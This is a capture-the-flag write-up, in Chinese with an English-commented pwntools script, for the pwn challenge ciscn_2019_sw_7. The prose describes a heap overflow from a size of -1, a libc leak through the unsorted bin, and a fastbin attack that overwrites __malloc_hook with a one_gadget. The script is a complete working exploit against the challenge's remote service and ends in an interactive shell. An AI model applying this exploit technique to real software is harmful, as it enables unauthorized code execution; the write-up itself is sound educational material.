ciscn_2019_sw_7

🐛

new 的时候如果 size 输入 -1，会分配一块大小为 0x20 的 chunk0，但读入长度却按 0xffffffff 处理，可以输入远超 chunk 大小的内容，产生堆溢出。利用这一点把 chunk1 的 size 改成 0x91（正好等于 chunk1 的 0x20 加 chunk2 的 0x70，并且超出 fastbin 范围），free 掉 chunk1 后它进入 unsorted bin；之后再申请一块 0x20 的 note 切割这个 unsorted chunk，剩余部分正好落在 chunk2 的位置，其 fd/bk 指向 main_arena+88，用 show 功能读出 chunk2 的内容即可拿到 libc 的 leak。

之后就是 fastbin attack：再次利用同样的溢出把已经 free 掉的 chunk3 的 fd 改成 __malloc_hook-0x23（利用 __malloc_hook 附近的 0x7f 字节通过 0x70 fastbin 的 size 检查），连续两次申请 0x60 就能拿到这块伪 chunk，把 one_gadget 写进 __malloc_hook，最后再触发一次 malloc 即可 getshell。

exp:

from pwn import *
from LibcSearcher import *
# Target: the remote BUUOJ instance. Swap in the process() line for local runs.
# sh = process("./ciscn_2019_sw_7.dms")
HOST, PORT = "pwn.buuoj.cn", 20134
sh = remote(HOST, PORT)
# libc shipped with the challenge. It is loaded for reference only: the
# main_arena / __malloc_hook offsets further down are hard-coded constants.
libc = ELF("x64_libc.so.6")
# one_gadget candidates for that libc; the exploit uses index 2.
onegadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
def new(size, content):
    """Menu option 1: allocate a note of `size` bytes and fill it with `content`.

    `size` is sent as a decimal string, so a negative value (the -1 used to
    trigger the overflow) reaches the binary unchanged. Both the size and the
    content prompt end in "note:", hence the two identical delimiters.
    """
    sh.sendlineafter("> ", "1")
    sh.sendlineafter("note:", str(size))
    sh.sendlineafter("note:", content)
def show(idx):
    """Menu option 2: print note `idx`. The caller is responsible for reading the output."""
    sh.sendlineafter("> ", "2")
    sh.sendlineafter("Index:", str(idx))
def delete(idx):
    """Menu option 4: free note `idx`."""
    sh.sendlineafter("> ", "4")
    sh.sendlineafter("Index:", str(idx))
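# ---- Stage 1: libc leak via heap overflow -> unsorted bin ----------------
new(0x10, 'a')  # 0: 0x20 chunk, reallocated below with size -1 for the overflow
new(0x10, 'b')  # 1: 0x20 chunk, its size field is the overflow target
new(0x60, 'c')  # 2: 0x70 chunk, ends up holding the main_arena pointer
new(0x60, 'd')  # 3: 0x70 chunk, fastbin-dup victim in stage 2
new(0x60, 'e')  # 4: 0x70 chunk, keeps chunk 3 away from the top chunk
delete(0)
# size -1 hands back the 0x20 chunk but the read length is not bounded by it
# (see the write-up above). The 0x91 lands on chunk 1's size field: 0x90 spans
# chunk 1 (0x20) + chunk 2 (0x70) and is too large for a fastbin, so the next
# free puts it in the unsorted bin. NOTE(review): the 16 zero bytes before it
# only line up if the note body starts 8 bytes into the chunk -- confirm
# against the binary before reusing this layout elsewhere.
new(-1, p64(0) * 2 + p64(0x91))  # 0
delete(1)                        # 0x90 chunk -> unsorted bin
new(0x10, 'a')                   # 1: split it; the 0x70 remainder at chunk 2 keeps fd/bk = main_arena+88
show(2)
sh.recvuntil("2 : ")
# Only 6 bytes of a userland pointer are non-zero; pad to 8 before unpacking.
# ljust with a bytes fill works unchanged on both Python 2 and 3.
leak = u64(sh.recv(6).ljust(8, b'\x00'))
mallochook = leak - 88 - 0x10    # __malloc_hook sits 0x10 below main_arena
libcbase = leak - 88 - 0x3C4B20  # main_arena offset; matches the usual libc-2.23 x64 layout -- verify against x64_libc.so.6
# A libc base is always page-aligned; anything else means the leak was parsed
# wrongly or the hard-coded offsets do not match the remote libc.
if libcbase & 0xfff:
    log.error("libc base %s is not page-aligned: bad leak or wrong libc offsets" % hex(libcbase))
log.success("mallochook: " + hex(mallochook))
log.success("libcbase: " + hex(libcbase))

# ---- Stage 2: fastbin dup onto __malloc_hook -----------------------------
delete(3)  # chunk 3 -> 0x70 fastbin
delete(0)  # chunk 0 -> 0x20 fastbin, reallocated next with size -1 for a second overflow
# Fake chunk just below __malloc_hook; the byte there passes the 0x70 fastbin size check.
fake_chunk = mallochook - 0x23
# Rewrite everything from chunk 0 up to chunk 3's fd in one overflow, keeping
# the intermediate chunks consistent so malloc's checks keep passing.
payload = (
    p64(0) * 2           # tail of chunk 0 + chunk 1 prev_size
    + p64(0x21)          # chunk 1 size restored
    + p64(0) * 3         # chunk 1 body + chunk 2 prev_size
    + p64(0x71)          # chunk 2 size
    + p64(leak) * 2      # chunk 2 fd/bk stay main_arena+88 (it is still in the unsorted bin)
    + p64(0) * 10        # rest of chunk 2
    + p64(0x70) * 2      # chunk 3 prev_size/size, prev_inuse clear because chunk 2 is free
    + p64(fake_chunk)    # chunk 3 fd -> fake chunk below __malloc_hook
)
new(-1, payload)  # 0
new(0x60, 'a')    # pops chunk 3 from the 0x70 fastbin
# pops the fake chunk; 11 zero bytes pad up to __malloc_hook (8 + 11 == 0x23 - 0x10,
# consistent with the note body starting 8 bytes into the chunk -- see note above)
new(0x60, b'\x00' * 11 + p64(libcbase + onegadget[2]))
# Trigger: the next allocation goes through __malloc_hook -> one_gadget, so
# only the size prompt is answered; no content prompt follows.
sh.sendlineafter("> ", "1")
sh.sendlineafter("note:", "4eriri")
# gdb.attach(sh)  # uncomment when debugging against a local process
sh.interactive()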